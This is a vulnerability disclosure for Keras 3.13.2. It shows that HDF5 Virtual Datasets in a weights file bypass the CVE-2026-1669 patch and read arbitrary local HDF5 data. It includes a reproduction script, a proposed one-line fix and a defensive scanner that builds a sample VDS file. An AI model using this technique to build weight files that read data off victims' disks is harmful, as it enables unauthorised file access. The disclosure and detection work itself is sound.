KERAS-VDS-001: CVE-2026-1669 Patch Bypass via HDF5 Virtual Datasets

Reporter: Viridis Security (viridisnorthllc@gmail.com)
Severity: High | CVSS 7.8 | CWE-610
Affected: Keras 3.13.2 (latest; intended CVE-2026-1669 fix)

What this file is

malicious_vds.weights.h5 is a crafted Keras weights file containing an HDF5 Virtual Dataset (VDS) in its vars/ group. When loaded via model.load_weights() on Keras 3.13.2, it bypasses the CVE-2026-1669 patch and silently reads data from an arbitrary HDF5 file on the victim filesystem.

The Bypass

Keras 3.13.2 patches CVE-2026-1669 by checking dataset.external in _verify_dataset(). HDF5 Virtual Datasets use dataset.is_virtual, a completely different property, and return dataset.external = None (falsy). The patch guard never fires.

| Mechanism | h5py property | Value for VDS | Patch catches? |
|---|---|---|---|
| ExternalStorage | dataset.external | None ← falsy | ✅ (patched) |
| Virtual Dataset | dataset.is_virtual | True | ❌ bypass |

Reproduce (Colab / local Python)

# Step 1: Create victim file (represents any HDF5 data on victim disk)
import h5py, numpy as np
with h5py.File("victim_sensitive.h5", "w") as f:
    f.create_dataset("secret_weights", data=np.arange(64, dtype=np.float32) * 1.337)
    f.attrs["canary"] = "VIRIDIS_CANARY_VDS_001"

# Step 2: Load malicious weights; no exception is raised on Keras 3.13.2
import keras
model = keras.Sequential([keras.layers.Dense(1, input_shape=(64,), use_bias=False)])
model.build((None, 64))
model.load_weights("malicious_vds.weights.h5")   # ← triggers VDS read
print(model.layers[0].kernel.numpy().flatten()[:4])
# Output: [ 0.  1.337  2.674  4.011 ] (data from victim_sensitive.h5)

The VDS in this file points to victim_sensitive.h5::secret_weights. The path is relative: it resolves from the current working directory when load_weights() is called.

Fix

Add a dataset.is_virtual check in keras/src/saving/saving_lib.py:

if dataset.is_virtual:
    raise ValueError("Not allowed: H5 file Dataset with virtual sources (VDS)")
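
A pre-load check that a consumer of untrusted weight files can run with h5py, as an added example (not code from the reporter or from Keras): it walks every dataset and reports any whose storage is external or virtual, testing the two properties separately as the table above requires. The function names, the fixture file names and the g/w dataset path are constructed for illustration.

```python
import os
import tempfile

import h5py


def scan_h5(path):
    """Return sorted (dataset_name, reason) pairs for datasets stored outside `path`."""
    findings = []

    def visit(name, obj):
        if not isinstance(obj, h5py.Dataset):
            return
        if obj.external:  # external storage: what the 3.13.2 guard looks at, per the page
            findings.append((name, "external"))
        if obj.is_virtual:  # virtual dataset: external is None here, so test it separately
            sources = sorted({m.file_name for m in obj.virtual_sources()})
            findings.append((name, "virtual -> " + ", ".join(sources)))

    with h5py.File(path, "r") as f:  # inspects dataset properties only; no data is read
        f.visititems(visit)
    return sorted(findings)


def require_self_contained(path):
    """Call before model.load_weights(path); raises if any dataset points elsewhere."""
    findings = scan_h5(path)
    if findings:
        raise ValueError(f"{path}: datasets backed by other files: {findings}")
    return path


def build_samples(workdir):
    """Constructed fixtures: an ordinary file and one holding a VDS (source never created)."""
    plain = os.path.join(workdir, "plain.h5")
    with h5py.File(plain, "w") as f:
        f.create_group("g").create_dataset("w", data=[0.0] * 4, dtype="f4")
    vds = os.path.join(workdir, "vds.h5")
    layout = h5py.VirtualLayout(shape=(4,), dtype="f4")
    layout[:] = h5py.VirtualSource("constructed_source.h5", "data", shape=(4,))
    with h5py.File(vds, "w", libver="latest") as f:
        f.create_group("g").create_virtual_dataset("w", layout)
    return plain, vds


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        for p in build_samples(d):
            print(os.path.basename(p), scan_h5(p))
```

The scan reports the source file names recorded in the VDS mapping, which gives a reviewer the paths the file would have pulled from.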

Submitted to huntr.dev MFV program | Viridis Security
